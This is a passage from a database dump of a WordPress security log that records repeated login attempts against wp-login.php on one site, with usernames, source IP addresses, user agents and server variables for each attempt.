CRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746749700.071764;s:12:\"REQUEST_TIME\";i:1746749700;}}','198.187.29.183',0,'2025-05-09 05:45:01','1970-01-01 00:00:00'),(95019,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"es-ES,es;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"45504\";s:11:\"REMOTE_ADDR\";s:15:\"103.179.190.244\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746750286.092685;s:12:\"REQUEST_TIME\";i:1746750286;}}','103.179.190.244',0,'2025-05-09 05:54:47','1970-01-01 00:00:00'),(95020,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"55785\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746750845.344955;s:12:\"REQUEST_TIME\";i:1746750845;}}','35.154.1.88',1,'2025-05-09 06:04:07','2025-05-10 07:10:33'),(95021,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"128\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"55786\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"128\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746750845.345916;s:12:\"REQUEST_TIME\";i:1746750845;}}','35.154.1.88',1,'2025-05-09 06:04:08','2025-05-10 07:10:32'),(95022,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"107\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"55792\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"107\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746750847.1890409;s:12:\"REQUEST_TIME\";i:1746750847;}}','35.154.1.88',1,'2025-05-09 06:04:08','2025-05-10 07:10:31'),(95023,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"116\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"55793\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"116\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746750847.242943;s:12:\"REQUEST_TIME\";i:1746750847;}}','35.154.1.88',1,'2025-05-09 06:04:09','2025-05-10 07:10:34'),(95024,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"55794\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746750848.190213;s:12:\"REQUEST_TIME\";i:1746750848;}}','35.154.1.88',1,'2025-05-09 06:04:09','2025-05-10 07:10:33'),(95025,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ru-RU,ru;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:15:\"HTTP_USER_AGENT\";s:125:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"43756\";s:11:\"REMOTE_ADDR\";s:15:\"134.122.118.246\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746750876.764538;s:12:\"REQUEST_TIME\";i:1746750876;}}','134.122.118.246',0,'2025-05-09 06:04:38','1970-01-01 00:00:00'),(95026,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"he-IL,he;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51952\";s:11:\"REMOTE_ADDR\";s:12:\"69.57.162.14\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746751471.5041609;s:12:\"REQUEST_TIME\";i:1746751471;}}','69.57.162.14',0,'2025-05-09 06:14:33','1970-01-01 00:00:00'),(95027,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"it-IT,it;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"59860\";s:11:\"REMOTE_ADDR\";s:13:\"54.36.209.164\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746752069.9530699;s:12:\"REQUEST_TIME\";i:1746752069;}}','54.36.209.164',0,'2025-05-09 06:24:31','1970-01-01 00:00:00'),(95028,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"121\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"63191\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"121\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746752154.215909;s:12:\"REQUEST_TIME\";i:1746752154;}}','35.154.1.88',1,'2025-05-09 06:25:55','2025-05-10 07:10:32'),(95029,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"63188\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746752154.2164099;s:12:\"REQUEST_TIME\";i:1746752154;}}','35.154.1.88',1,'2025-05-09 06:25:56','2025-05-10 07:10:33'),(95030,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; 